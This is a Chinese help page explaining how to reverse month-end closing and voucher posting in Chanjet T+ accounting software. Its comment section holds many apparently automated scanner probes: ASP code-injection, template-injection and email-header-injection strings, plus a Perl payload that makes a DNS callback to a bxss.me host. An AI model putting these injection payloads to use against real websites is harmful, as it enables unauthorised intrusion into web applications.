t 如何反记账

默认标题_公众号封面小图_2020-08-20-0 (8).png


畅捷通T+反结账反记账取消月末结账(ctrl+shift+f6)和取消凭证记账(ctrl+h)没有反应?这种情况一般出现在笔记本用户中。检查键盘是否有Fn键

一、取消结账步骤

1、系统管理-期末处理-账务结账,如下图单击图片可以查看大图):

1.png

2、打开“财务结账”界面,如下图(单击图片可以查看大图):

2.png

3、点“取消结账”,如下图(单击图片可以查看大图):

3.jpg


二、取消记账步骤

1、总账凭证凭证管理,如下图(单击图片可以查看大图):


2、进入“凭证管理”“查询条件”,如下图(单击图片可以查看大图):

5.jpg

3、选择“会计期间”等查询条件后点“确定”如下图(单击图片可以查看大图

6.jpg

4、进入“凭证管理”,选择需要反记账的凭证,如下图(单击图片可以查看大图):

7.jpg

5、同时按键盘上的Ctrl+Alt+H按键”→弹出提示:“取消记账,是否继续”→点“是”,如下图(单击图片可以查看大图):

8.jpg

6、右上角出现“单据取消记账成功!”如下图(单击图片可以查看大图):

9.jpg

7、在“待记账”页签下可以查看已经取消记账的凭证如下图(单击图片可以查看大图):

10.jpg

三、畅捷通T+反结账反记账注意事项

1、畅捷通T+取消月末结账(ctrl+shift+f6)和取消凭证记账(ctrl+h)没有反应?这种情况一般出现在笔记本用户中。检查键盘是否有Fn键。如果有Fn需要加按Fn

2、T3/T6/U8取消月末结账时,选中需要取消月末结账的月份,同时按Fn+ctrl+shift+f6,即可恢复月末结账。

3、T3/T6/U8取消凭证记账时,先点开“总账”–“期末”–“对账”,然后再同时按Fn+ctrl+h,恢复月末记账前状态激活之后,点开“总账”–“凭证”–“恢复记账前状态”,选择恢复到月初或是最近一次记账状态。如有其它问题,请联系在线客服咨询>> 我们将第一时间与您联系,帮助您解决问题。

更多精彩推荐,请关注我们

用友畅捷通T+外网配置方法

【T+】如何整理凭证断号?

畅捷通T+如何设置现金流量

→这里有更多你感兴趣的内容←

合智互联客户成功服务热线:400-1565-661

admin
admin管理员

上一篇:鼓励软件产业和集成电路产业发展的税收政策(四)
下一篇:集中核算

留言评论

530条留言

评论列表

pHqghUme
1
2022-04-26 13:07:23 回复
pHqghUme
2022-04-26 13:07:28 回复
pHqghUme
2022-04-26 13:09:03 回复
pHqghUme
2022-04-26 13:09:07 回复
pHqghUme
2022-04-26 13:15:11 回复
pHqghUme
2022-04-26 13:15:00 回复
pHqghUme
2022-04-26 13:15:04 回复
pHqghUme
2022-04-26 13:14:49 回复
pHqghUme
2022-04-26 13:14:53 回复
pHqghUme
1
2022-04-26 13:10:59 回复
pHqghUme
2022-04-26 13:15:30 回复
pHqghUme
2022-04-26 13:15:35 回复
pHqghUme
1
2022-04-26 13:10:59 回复
pHqghUme
2022-04-26 13:15:41 回复
pHqghUme
2022-04-26 13:15:48 回复
pHqghUme
1
2022-04-26 13:11:00 回复
pHqghUme
2022-04-26 13:15:54 回复
pHqghUme
2022-04-26 13:16:01 回复
pHqghUme
1
2022-04-26 13:11:00 回复
pHqghUme
2022-04-26 13:16:07 回复
pHqghUme
2022-04-26 13:16:12 回复
pHqghUme
1
2022-04-26 13:11:01 回复
pHqghUme
2022-04-26 13:16:20 回复
pHqghUme
2022-04-26 13:16:25 回复
pHqghUme
1
2022-04-26 13:11:02 回复
pHqghUme
2022-04-26 13:16:31 回复
pHqghUme
2022-04-26 13:16:37 回复
pHqghUme
ExVQNi0X
2022-04-26 13:11:03 回复
pHqghUme
2022-04-26 13:16:44 回复
pHqghUme
2022-04-26 13:16:51 回复
pHqghUme
1
2022-04-26 13:11:03 回复
pHqghUme
2022-04-26 13:16:58 回复
pHqghUme
2022-04-26 13:17:03 回复
pHqghUme
1
2022-04-26 13:11:04 回复
pHqghUme
2022-04-26 13:17:09 回复
pHqghUme
2022-04-26 13:17:14 回复
pHqghUme
1
2022-04-26 13:11:04 回复
pHqghUme
2022-04-26 13:17:21 回复
pHqghUme
2022-04-26 13:17:26 回复
pHqghUme
1
2022-04-26 13:11:04 回复
pHqghUme
2022-04-26 13:17:32 回复
pHqghUme
2022-04-26 13:17:37 回复
pHqghUme
1
2022-04-26 13:11:04 回复
pHqghUme
2022-04-26 13:17:43 回复
pHqghUme
1
2022-04-26 13:11:04 回复
pHqghUme
1
2022-04-26 13:11:04 回复
pHqghUme
1
2022-04-26 13:11:05 回复
TpJsz4vw
1
2022-04-26 13:11:05 回复
pHqghUme
1
2022-04-26 13:11:05 回复
pHqghUme
1
2022-04-26 13:11:05 回复
pHqghUme
1
2022-04-26 13:11:05 回复
pHqghUme
1
2022-04-26 13:11:05 回复
pHqghUme
1
2022-04-26 13:11:06 回复
pHqghUme
1
2022-04-26 13:11:07 回复
pHqghUme
1
2022-04-26 13:11:07 回复
pHqghUme
1
2022-04-26 13:11:07 回复
pHqghUme
1
2022-04-26 13:11:07 回复
pHqghUme
1
2022-04-26 13:11:07 回复
pHqghUme
1
2022-04-26 13:11:08 回复
pHqghUme
1
2022-04-26 13:11:08 回复
pHqghUme
1
2022-04-26 13:11:08 回复
pHqghUme
response.write(9231042*9466775)
2022-04-26 13:11:08 回复
pHqghUme
1
2022-04-26 13:11:08 回复
pHqghUme
1
2022-04-26 13:11:08 回复
pHqghUme
1
2022-04-26 13:11:09 回复
pHqghUme
1
2022-04-26 13:11:09 回复
pHqghUme
1
2022-04-26 13:11:10 回复
pHqghUme
1
2022-04-26 13:11:10 回复
pHqghUme
'+response.write(9231042*9466775)+'
2022-04-26 13:11:10 回复
pHqghUme
1
2022-04-26 13:11:10 回复
pHqghUme
1
2022-04-26 13:11:10 回复
pHqghUme
1
2022-04-26 13:11:10 回复
pHqghUme
1
2022-04-26 13:11:11 回复
pHqghUme
1
2022-04-26 13:11:11 回复
pHqghUme
1
2022-04-26 13:11:11 回复
pHqghUme
"+response.write(9231042*9466775)+"
2022-04-26 13:11:12 回复
pHqghUme
${9999399+9999147}
2022-04-26 13:11:12 回复
pHqghUme
1
bcc:009247.1263-4656.1263.4f5a0.19108.2@bxss.me
2022-04-26 13:11:12 回复
pHqghUme
1
2022-04-26 13:11:12 回复
pHqghUme
1
2022-04-26 13:11:13 回复
pHqghUme
1
2022-04-26 13:11:13 回复
pHqghUme
1
2022-04-26 13:11:13 回复
pHqghUme
1
2022-04-26 13:11:14 回复
pHqghUme
to@example.com˃
bcc:009247.1263-4657.1263.4f5a0.19108.2@bxss.me
2022-04-26 13:11:14 回复
pHqghUme
1
2022-04-26 13:11:14 回复
pHqghUme
1
2022-04-26 13:11:14 回复
pHqghUme
1
2022-04-26 13:11:14 回复
pHqghUme
1
2022-04-26 13:11:14 回复
pHqghUme
1
2022-04-26 13:11:14 回复
pHqghUme
1
2022-04-26 13:11:14 回复
pHqghUme
1
2022-04-26 13:11:14 回复
pHqghUme
1
2022-04-26 13:11:14 回复
pHqghUme
1
2022-04-26 13:11:15 回复
pHqghUme
1
2022-04-26 13:11:15 回复
pHqghUme
1
2022-04-26 13:11:15 回复
pHqghUme
1
2022-04-26 13:11:16 回复
pHqghUme
1
2022-04-26 13:11:16 回复
pHqghUme
1
2022-04-26 13:11:16 回复
pHqghUme
1
2022-04-26 13:11:16 回复
pHqghUme
1
2022-04-26 13:11:16 回复
pHqghUme
1
2022-04-26 13:11:16 回复
pHqghUme
1
2022-04-26 13:11:16 回复
pHqghUme
1
2022-04-26 13:11:16 回复
pHqghUme
1
2022-04-26 13:11:17 回复
pHqghUme
1
2022-04-26 13:11:17 回复
pHqghUme
1
2022-04-26 13:11:17 回复
pHqghUme
1
2022-04-26 13:11:17 回复
pHqghUme
1
2022-04-26 13:11:17 回复
pHqghUme
1
2022-04-26 13:11:17 回复
pHqghUme
1
2022-04-26 13:11:18 回复
pHqghUme
1
2022-04-26 13:11:18 回复
pHqghUme
1
2022-04-26 13:11:18 回复
pHqghUme
1&n917758=v911720
2022-04-26 13:11:19 回复
pHqghUme
1
2022-04-26 13:11:19 回复
pHqghUme
12345'"\'\");|]*{
2022-04-26 13:11:19 回复
pHqghUme
1
2022-04-26 13:11:20 回复
pHqghUme
1
2022-04-26 13:11:20 回复
pHqghUme
1
2022-04-26 13:11:20 回复
pHqghUme
1
2022-04-26 13:11:20 回复
pHqghUme
1
2022-04-26 13:11:20 回复
pHqghUme
1
2022-04-26 13:11:20 回复
pHqghUme
1
2022-04-26 13:11:21 回复
pHqghUme
1
2022-04-26 13:11:21 回复
pHqghUme
1
2022-04-26 13:11:21 回复
pHqghUme
1
2022-04-26 13:11:21 回复
pHqghUme
1
2022-04-26 13:11:21 回复
pHqghUme
1
2022-04-26 13:11:22 回复
pHqghUme
1
2022-04-26 13:11:22 回复
pHqghUme
1
2022-04-26 13:11:22 回复
pHqghUme
1
2022-04-26 13:11:22 回复
pHqghUme
'.gethostbyname(lc('hitjs'.'kmpcohnna3aac.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(72).chr(104).chr(72).'
2022-04-26 13:11:23 回复